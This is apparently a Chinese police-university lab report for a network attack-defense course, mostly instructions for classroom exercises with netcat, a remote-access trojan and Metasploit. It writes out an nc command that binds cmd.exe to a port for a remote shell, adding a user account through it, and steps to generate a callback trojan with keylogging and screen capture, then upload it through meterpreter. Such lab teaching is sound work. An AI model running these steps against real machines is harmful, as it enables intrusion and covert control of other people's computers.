網路攻防實驗四201821420007張博琳

2022-07-11 11:48:16 字數 3999 閱讀 2347

學   號

中國人民公安大學

chinese people』 public security university

網路對抗技術

實驗報告

實驗四惡意**技術

學生姓名

張博琳年級

2018

區隊網安二區

指導教師

高見

資訊科技與網路安全學院

2016117

實驗任務總綱

2016—2017學年學期

一、實驗目的

1.通過對木馬的練習,使讀者理解和掌握木馬傳播和執行的機制;通過手動刪除木馬,掌握檢查木馬和刪除木馬的技巧,學會防禦木馬的相關知識,加深對木馬的安全防範意識。

2.了解並熟悉常用的網路攻擊工具,木馬的基本功能;

3.達到鞏固課程知識和實際應用的目的。

二、實驗要求

1.認真閱讀每個實驗內容,需要截圖的題目,需清晰截圖並對截圖進行標註和說明。

2.文件要求結構清晰,**表達準確,標註規範。推理內容客觀、合理、邏輯性強。

3.軟體工具可使用nc、msf等。

4.實驗結束後,保留電子文件。

三、實驗步驟

1.準備

提前做好實驗準備,實驗前應把詳細了解實驗目的、實驗要求和實驗內容,熟悉並準備好實驗用的軟體工具,按照實驗內容和要求提前做好實驗內容的準備。

2.實驗環境

描述實驗所使用的硬體和軟體環境(包括各種軟體工具);

開機並啟動軟體office2003或2007、瀏覽器、加解密軟體。

3.實驗過程

1)啟動系統和啟動工具軟體環境。

2)用軟體工具實現實驗內容。

4.實驗報告

按照統一要求的實驗報告格式書寫實驗報告。把按照模板格式編寫的文件嵌入到實驗報告文件中,文件按照規定的書寫格式書寫,**要有表說圖形要有圖說。

任務一 利用nc控制電腦

netcat,具有網路軍刀之稱,它小巧精悍且功能強大,說它小巧精悍,是因為他的軟體大小現在已經壓縮到只有十幾kb,而且在功能上絲毫不減。

實驗過程需要兩個同學相互配合完成:

步驟一:

在受害者的機器 (同學a)

輸入下面的命令:

nc.exe -l

-p port -e cmd.exe   進入監聽模式

步驟二:

在攻擊者的機器.(同學b)

輸入下面的命令:

ncip  port //連線victim_ip,然後得到乙個shell。 (需要截圖)

步驟三:

在shell中,利用net user 使用者名稱 密碼 /add ,新增乙個使用者,並在受害者的機器中使用 net user 命令進行驗證。(需要截圖)

可以繼續通過命令列做一些事情。

任務二 利用木馬控制電腦

備用,另外乙個木馬)

實驗過程需要兩個同學配合:

步驟一:

攻擊者的機器. (同學a)

開啟v2014.exe程式或則star rat,這兩個木馬功能類似。

步驟二:

點選選單欄中的「服務生成」,在彈出的配置服務端中,配置回ip位址(攻擊者ip)和埠號,並點選「生成」按鈕,生成木馬服務端。

步驟三:

將生成的木馬可執行程式拷貝到受害者的機器,並雙擊執行。 

步驟四:

在控制端中檢視木馬上線情況,並對以下功能每個進行測試和截圖。 【部分功能可能會無效,可以不用截圖】

檔案管理,嘗試拷貝檔案

螢幕控制,嘗試獲取桌面

鍵盤記錄,嘗試獲取對方擊鍵記錄

會話管理,重啟對方機器,檢視是否能自啟動上線

可以重啟,但無法上線

會話管理,解除安裝對方的木馬。

任務三木馬分析

1.將任務二中生成的木馬設定具備自刪除功能和自啟動功能,對其進行分析。回答以下問題(截圖證明)

(推薦使用「火絨劍」工具)

該木馬的回連ip是?192.168.31.57

該木馬的回連埠是?2012

該木馬自刪除後,會將自身的宿主程式改成什麼名字,並隱藏到系統其它目錄中。winword.exe

該木馬依靠什麼方法實現自啟動的,怎麼實現的。

任務四msf攻擊體驗

2.在主機b上安裝metasploitframework,並在安裝目錄中啟動/bin下的msfconsole

3.進入msf命令列後使用search命令查詢相關模組,use 載入模組,show options 檢視引數。

4.把遠端目標引數rhosts設定為主機a的ip位址,開始攻擊。

5.進入到meterpreter> 命令列下,說明已經獲取到shell,可以使用sysinfo檢視目標系統的資訊,screenshot截圖。

下面的步驟是進一步控制目標機器,上傳木馬。

1.在b機器上搭建ftp,設定使用者名稱和密碼。

2.在b機器開啟木馬控制端,生成木馬server.exe,並放置在ftp目錄下。

3.在meterpreter>命令列下輸入shell ,進入被控機器的shell

涉及到的ftp命令有:

ftp  192.168.31.100  登入

在d盤找到1.exe

網路攻防實驗四

中國人民公安大學 chinese people public security university 網路對抗技術 實驗報告 實驗四惡意 技術 學生姓名 吳昊程年級 2018級 區隊18網六 指導教師 高見資訊科技與網路安全學院 2020年12月3日 實驗任務總綱 2020 2021 學年 第 一 ...

網路攻防實驗二

networkminer 3 實驗過程 1 啟動系統和啟動工具軟體環境。2 用軟體工具實現實驗內容。4 實驗報告 按照統一要求的實驗報告格式書寫實驗報告。把按照模板格式編寫的文件嵌入到實驗報告文件中,文件按照規定的書寫格式書寫,要有表說圖形要有圖說。第一部分 arp欺騙 1.兩個同學一組,進行實驗拓...

網路攻防實驗(連更)

了解本地系統密碼的破解 熟悉掌握暴力破解和字典破解 saminside暴力破解工具的使用。實驗環境 本地主機a windows xp saminside工具。實驗步驟 控制面板 管理工具 計算機管理 本地使用者和組 使用者 guest 設定密碼 實驗室為了避免破解時間過長,不要太複雜 執行samin...